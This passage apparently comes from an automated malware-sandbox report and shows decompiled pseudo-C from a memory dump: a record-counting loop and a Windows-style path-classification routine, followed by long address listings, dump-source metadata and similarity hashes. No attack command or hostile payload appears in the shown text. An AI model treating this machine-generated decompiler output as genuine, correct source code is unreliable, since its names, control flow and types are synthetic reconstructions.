																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E049D4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0495D130(_t427, _t494, _t511);
				}
			}










































































                                                      0x049d5ba5
                                                      0x049d5baa
                                                      0x049d5baf
                                                      0x049d5bb4
                                                      0x049d5bb6
                                                      0x049d5bbc
                                                      0x049d5bbe
                                                      0x049d5bc4
                                                      0x049d5bcd
                                                      0x049d5bd3
                                                      0x049d5bd6
                                                      0x049d5bdc
                                                      0x049d5be0
                                                      0x049d5be3
                                                      0x049d5beb
                                                      0x049d5bf2
                                                      0x049d5bf8
                                                      0x049d5bfe
                                                      0x049d5c04
                                                      0x049d5c0e
                                                      0x049d5c18
                                                      0x049d5c1f
                                                      0x049d5c25
                                                      0x049d5c2a
                                                      0x049d5c2c
                                                      0x049d5c32
                                                      0x049d5c3a
                                                      0x049d5c3f
                                                      0x049d5c42
                                                      0x049d5c48
                                                      0x049d5c5b
                                                      0x049d5c5b
                                                      0x049d5c2c
                                                      0x049d5cb7
                                                      0x049d5cb9
                                                      0x049d5cbf
                                                      0x049d5cc2
                                                      0x049d5cca
                                                      0x049d5ccb
                                                      0x049d5ccb
                                                      0x049d5cd1
                                                      0x049d5cd7
                                                      0x049d5cda
                                                      0x049d5ce1
                                                      0x049d5ce4
                                                      0x049d5ce7
                                                      0x049d5ced
                                                      0x049d5cf3
                                                      0x049d5cf9
                                                      0x049d5cff
                                                      0x049d5d08
                                                      0x049d5d0a
                                                      0x049d5d0e
                                                      0x049d5d10
                                                      0x00000000
                                                      0x00000000
                                                      0x049d5d16
                                                      0x049d5d1a
                                                      0x00000000
                                                      0x00000000
                                                      0x049d5d20
                                                      0x049d5d22
                                                      0x049d5d25
                                                      0x049d5d2f
                                                      0x049d5d2f
                                                      0x049d5d33
                                                      0x049d5d3d
                                                      0x049d5d49
                                                      0x049d5d4b
                                                      0x00000000
                                                      0x00000000
                                                      0x049d5d5a
                                                      0x049d5d5d
                                                      0x049d5d60
                                                      0x00000000
                                                      0x00000000
                                                      0x049d5d66
                                                      0x049d5d69
                                                      0x00000000
                                                      0x00000000
                                                      0x049d5d6f
                                                      0x049d5d6f
                                                      0x049d5d73
                                                      0x049d5d79
                                                      0x049d5d7f
                                                      0x049d5d86
                                                      0x049d5d95
                                                      0x049d5d98
                                                      0x049d5dba
                                                      0x049d5dcb
                                                      0x049d5dce
                                                      0x049d5dd3
                                                      0x049d5dd6
                                                      0x049d5dd8
                                                      0x049d5de6
                                                      0x049d5dec
                                                      0x049d5dee
                                                      0x049d5df1
                                                      0x049d5df3
                                                      0x049d635a
                                                      0x049d635a
                                                      0x00000000
                                                      0x049d635a
                                                      0x049d5dfe
                                                      0x049d5e02
                                                      0x049d5e05
                                                      0x049d5e07
                                                      0x049d5e10
                                                      0x049d5e13
                                                      0x049d5e1b
                                                      0x049d5e1c
                                                      0x049d5e21
                                                      0x049d5e22
                                                      0x049d5e23
                                                      0x049d5e25
                                                      0x049d5e2a
                                                      0x049d5e2c
                                                      0x049d5e2e
                                                      0x049d5e36
                                                      0x049d5e39
                                                      0x049d5e42
                                                      0x049d5e47
                                                      0x049d5e4d
                                                      0x049d5e54
                                                      0x049d5e54
                                                      0x049d5e54
                                                      0x049d5e2e
                                                      0x049d5e5c
                                                      0x049d5e5f
                                                      0x049d5e62
                                                      0x049d5e64
                                                      0x049d5e6b
                                                      0x049d5e70
                                                      0x049d5e7a
                                                      0x049d5e7a
                                                      0x049d5e7a
                                                      0x049d5e6b
                                                      0x049d5e7e
                                                      0x049d5e7f
                                                      0x049d5e7f
                                                      0x049d5e81
                                                      0x049d5e87
                                                      0x049d5e8b
                                                      0x049d5e8c
                                                      0x049d5e8c
                                                      0x049d5e8c
                                                      0x049d5e9a
                                                      0x049d5e9c
                                                      0x049d5ea2
                                                      0x049d5ea6
                                                      0x049d5f50
                                                      0x049d5f50
                                                      0x049d5f57
                                                      0x049d5f66
                                                      0x049d5f66
                                                      0x049d5f66
                                                      0x049d5f68
                                                      0x049d5f6a
                                                      0x049d63d0
                                                      0x00000000
                                                      0x049d5f70
                                                      0x049d5f70
                                                      0x049d5f91
                                                      0x049d5f9c
                                                      0x049d5f9e
                                                      0x049d5fa4
                                                      0x049d5fa6
                                                      0x049d638c
                                                      0x049d6392
                                                      0x049d63a1
                                                      0x049d63a7
                                                      0x049d63af
                                                      0x049d63af
                                                      0x049d63bd
                                                      0x049d63d8
                                                      0x00000000
                                                      0x049d63d8
                                                      0x049d5fac
                                                      0x049d5fb2
                                                      0x049d5fb4
                                                      0x049d5fbd
                                                      0x049d5fc6
                                                      0x049d5fce
                                                      0x049d5fd4
                                                      0x049d5fdc
                                                      0x049d5fec
                                                      0x049d5fed
                                                      0x049d5fee
                                                      0x049d5fef
                                                      0x049d5ff9
                                                      0x049d5ffa
                                                      0x049d5ffb
                                                      0x049d5ffc
                                                      0x049d6000
                                                      0x049d6004
                                                      0x049d6012
                                                      0x049d6012
                                                      0x049d6018
                                                      0x049d6019
                                                      0x049d601a
                                                      0x049d601b
                                                      0x049d601c
                                                      0x049d6020
                                                      0x049d6059
                                                      0x049d605c
                                                      0x049d6061
                                                      0x049d6061
                                                      0x049d6022
                                                      0x049d6022
                                                      0x049d6022
                                                      0x049d6025
                                                      0x049d602a
                                                      0x049d602b
                                                      0x049d6031
                                                      0x049d6037
                                                      0x049d6038
                                                      0x049d603e
                                                      0x049d6048
                                                      0x049d6049
                                                      0x049d604a
                                                      0x049d604b
                                                      0x049d604c
                                                      0x049d604d
                                                      0x049d6053
                                                      0x049d6054
                                                      0x049d6054
                                                      0x049d6062
                                                      0x049d6065
                                                      0x049d6067
                                                      0x049d606a
                                                      0x049d6070
                                                      0x049d6075
                                                      0x049d6076
                                                      0x049d6081
                                                      0x049d6087
                                                      0x049d6095
                                                      0x049d6099
                                                      0x049d609e
                                                      0x049d60a4
                                                      0x049d60ae
                                                      0x049d60b0
                                                      0x049d60b3
                                                      0x049d60b6
                                                      0x049d60b8
                                                      0x049d60ba
                                                      0x049d60ba
                                                      0x049d60ba
                                                      0x049d60ba
                                                      0x049d60be
                                                      0x049d60c0
                                                      0x049d60c5
                                                      0x049d60c5
                                                      0x049d60c5
                                                      0x049d60c6
                                                      0x049d60cd
                                                      0x049d6114
                                                      0x049d60cf
                                                      0x049d60cf
                                                      0x049d60d4
                                                      0x049d60d5
                                                      0x049d60da
                                                      0x049d60db
                                                      0x049d60e1
                                                      0x049d60e2
                                                      0x049d60e8
                                                      0x049d60f8
                                                      0x049d60fd
                                                      0x049d60fe
                                                      0x049d6102
                                                      0x049d6104
                                                      0x049d6107
                                                      0x049d6109
                                                      0x049d610b
                                                      0x049d610b
                                                      0x049d610b
                                                      0x049d610b
                                                      0x049d610f
                                                      0x049d610f
                                                      0x049d6117
                                                      0x049d611a
                                                      0x049d611f
                                                      0x049d6125
                                                      0x049d6134
                                                      0x049d6139
                                                      0x049d613f
                                                      0x049d6146
                                                      0x049d6148
                                                      0x049d614b
                                                      0x049d614d
                                                      0x049d614f
                                                      0x049d614f
                                                      0x049d614f
                                                      0x049d614f
                                                      0x049d6153
                                                      0x049d6159
                                                      0x049d6159
                                                      0x049d615c
                                                      0x049d6163
                                                      0x049d6169
                                                      0x049d616c
                                                      0x049d6172
                                                      0x049d6181
                                                      0x049d6186
                                                      0x049d6187
                                                      0x049d618b
                                                      0x049d6191
                                                      0x049d6195
                                                      0x049d61a3
                                                      0x049d61bb
                                                      0x049d61c0
                                                      0x049d61c3
                                                      0x049d61cc
                                                      0x049d61d0
                                                      0x049d61dc
                                                      0x049d61de
                                                      0x049d61e1
                                                      0x049d61e4
                                                      0x049d61e6
                                                      0x049d61e8
                                                      0x049d61e8
                                                      0x049d61e8
                                                      0x049d61e8
                                                      0x049d61e6
                                                      0x049d61ec
                                                      0x049d61f3
                                                      0x049d6203
                                                      0x049d6209
                                                      0x049d620a
                                                      0x049d6216
                                                      0x049d621d
                                                      0x049d6227
                                                      0x049d6241
                                                      0x049d6246
                                                      0x049d624c
                                                      0x049d6257
                                                      0x049d6259
                                                      0x049d625c
                                                      0x049d625e
                                                      0x049d6260
                                                      0x049d6260
                                                      0x049d6260
                                                      0x049d6260
                                                      0x049d625e
                                                      0x049d6264
                                                      0x049d6267
                                                      0x049d6269
                                                      0x049d6315
                                                      0x049d6315
                                                      0x049d631b
                                                      0x049d631e
                                                      0x049d6324
                                                      0x049d6327
                                                      0x049d632f
                                                      0x049d6330
                                                      0x049d6333
                                                      0x049d633a
                                                      0x049d633c
                                                      0x049d6335
                                                      0x049d6335
                                                      0x049d6335
                                                      0x049d633f
                                                      0x049d6342
                                                      0x049d634c
                                                      0x049d6352
                                                      0x049d6355
                                                      0x049d6355
                                                      0x049d6359
                                                      0x00000000
                                                      0x049d626f
                                                      0x049d6275
                                                      0x049d6275
                                                      0x049d6278
                                                      0x049d627e
                                                      0x049d627e
                                                      0x049d6281
                                                      0x049d6287
                                                      0x049d628d
                                                      0x049d6298
                                                      0x049d629c
                                                      0x049d62a2
                                                      0x049d629e
                                                      0x049d629e
                                                      0x049d629e
                                                      0x049d62a7
                                                      0x049d62a7
                                                      0x049d62aa
                                                      0x049d62b0
                                                      0x049d62f0
                                                      0x049d62f0
                                                      0x049d62f2
                                                      0x049d62f8
                                                      0x049d62fd
                                                      0x049d62b2
                                                      0x049d62b2
                                                      0x049d62b2
                                                      0x049d62b5
                                                      0x049d62dd
                                                      0x049d62e2
                                                      0x049d62e5
                                                      0x049d62b7
                                                      0x049d62b8
                                                      0x049d62bb
                                                      0x049d62bd
                                                      0x049d62c0
                                                      0x049d62c4
                                                      0x049d62cd
                                                      0x049d62cd
                                                      0x049d62c0
                                                      0x049d62bb
                                                      0x049d62b5
                                                      0x049d6302
                                                      0x049d6303
                                                      0x049d6305
                                                      0x049d6305
                                                      0x049d6305
                                                      0x049d630c
                                                      0x049d630c
                                                      0x00000000
                                                      0x049d627e
                                                      0x049d6269
                                                      0x049d5eac
                                                      0x049d5ebb
                                                      0x049d5ebe
                                                      0x049d5ecb
                                                      0x049d5ecb
                                                      0x049d5ece
                                                      0x049d5ece
                                                      0x049d5ed4
                                                      0x049d5ed7
                                                      0x049d5ed9
                                                      0x049d5edb
                                                      0x049d5edb
                                                      0x049d5ee1
                                                      0x049d5ee1
                                                      0x049d5ee3
                                                      0x049d5f20
                                                      0x049d5f20
                                                      0x049d5ee5
                                                      0x049d5ee5
                                                      0x049d5ee5
                                                      0x049d5ee8
                                                      0x049d5f11
                                                      0x049d5f18
                                                      0x049d5eea
                                                      0x049d5eea
                                                      0x049d5eed
                                                      0x049d5ef2
                                                      0x049d5ef8
                                                      0x049d5efb
                                                      0x049d5f0a
                                                      0x049d5f0a
                                                      0x049d5eed
                                                      0x049d5ee8
                                                      0x049d5f22
                                                      0x049d5f28
                                                      0x00000000
                                                      0x00000000
                                                      0x049d5f30
                                                      0x049d5f31
                                                      0x049d5f37
                                                      0x049d5f3a
                                                      0x049d5f3d
                                                      0x049d5f44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049d5f46
                                                      0x049d5f48
                                                      0x049d5f4d
                                                      0x00000000
                                                      0x049d5f4d
                                                      0x049d5dda
                                                      0x049d5ddf
                                                      0x00000000
                                                      0x049d5ddf
                                                      0x049d5dd8
                                                      0x049d5da7
                                                      0x049d5da9
                                                      0x049d5dac
                                                      0x049d5dae
                                                      0x00000000
                                                      0x049d5db4
                                                      0x049d5db4
                                                      0x00000000
                                                      0x049d5db4
                                                      0x049d5dae
                                                      0x049d5d88
                                                      0x049d5d8d
                                                      0x049d6363
                                                      0x049d6369
                                                      0x049d636a
                                                      0x049d6370
                                                      0x049d6372
                                                      0x049d637a
                                                      0x049d637b
                                                      0x049d637d
                                                      0x00000000
                                                      0x00000000
                                                      0x049d637f
                                                      0x049d6385
                                                      0x00000000
                                                      0x049d6385
                                                      0x049d5d38
                                                      0x049d5d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049d5d3b
                                                      0x049d5d27
                                                      0x049d5d29
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049d6360
                                                      0x00000000
                                                      0x049d6360
                                                      0x049d5c10
                                                      0x049d5c10
                                                      0x049d63da
                                                      0x049d63e5
                                                      0x049d63e5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 545c3123a9524384b94e6dd673f26b19c880f26818e40611e5435f2c54e2e50b
                                                      • Instruction ID: df2a66265fa61df24f5b303285030a91c9ac6acfe28422b14dac7becb03f6470
                                                      • Opcode Fuzzy Hash: 545c3123a9524384b94e6dd673f26b19c880f26818e40611e5435f2c54e2e50b
                                                      • Instruction Fuzzy Hash: 9B425B75A00229DFDB24CF68C880BA9B7B5FF49314F15C1AAD94DEB242E734A985CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04924120, Relevance: .4, Instructions: 444COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E04924120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x49fd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0493F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04926E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04924620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04926E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M049245F8))) {
												case 0:
													_v568 = 0x48e1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x48e11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04924620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0494F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0494F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E049052A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0491EB70(1, 0x49f79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0491AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E049495D0();
																			L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0494B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04943D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0494B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                      0x04924128
                                                      0x04924135
                                                      0x0492413c
                                                      0x04924141
                                                      0x04924145
                                                      0x04924147
                                                      0x0492414e
                                                      0x04924151
                                                      0x04924159
                                                      0x0492415c
                                                      0x04924160
                                                      0x04924164
                                                      0x04924168
                                                      0x0492416c
                                                      0x0492417f
                                                      0x04924181
                                                      0x0492446a
                                                      0x0492446a
                                                      0x0492418c
                                                      0x04924195
                                                      0x04924199
                                                      0x04924432
                                                      0x04924439
                                                      0x0492443d
                                                      0x04924442
                                                      0x04924447
                                                      0x00000000
                                                      0x0492419f
                                                      0x049241a3
                                                      0x049241b1
                                                      0x049241b9
                                                      0x049241bd
                                                      0x049245db
                                                      0x049245db
                                                      0x00000000
                                                      0x049241c3
                                                      0x049241c3
                                                      0x049241ce
                                                      0x049241d4
                                                      0x0496e138
                                                      0x0496e13e
                                                      0x0496e169
                                                      0x0496e16d
                                                      0x0496e19e
                                                      0x0496e16f
                                                      0x0496e16f
                                                      0x0496e175
                                                      0x0496e179
                                                      0x0496e18f
                                                      0x0496e193
                                                      0x00000000
                                                      0x0496e199
                                                      0x00000000
                                                      0x0496e199
                                                      0x0496e193
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049241da
                                                      0x049241da
                                                      0x049241df
                                                      0x049241e4
                                                      0x049241ec
                                                      0x04924203
                                                      0x04924207
                                                      0x0496e1fd
                                                      0x04924222
                                                      0x04924226
                                                      0x0496e1f3
                                                      0x0496e1f3
                                                      0x0492422c
                                                      0x0492422c
                                                      0x04924233
                                                      0x0496e1ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04924239
                                                      0x04924239
                                                      0x04924239
                                                      0x04924239
                                                      0x04924233
                                                      0x04924226
                                                      0x049241ee
                                                      0x049241ee
                                                      0x049241f4
                                                      0x04924575
                                                      0x0496e1b1
                                                      0x0496e1b1
                                                      0x00000000
                                                      0x0492457b
                                                      0x0492457b
                                                      0x04924582
                                                      0x0496e1ab
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04924588
                                                      0x04924588
                                                      0x0492458c
                                                      0x0496e1c4
                                                      0x0496e1c4
                                                      0x00000000
                                                      0x04924592
                                                      0x04924592
                                                      0x04924599
                                                      0x0496e1be
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
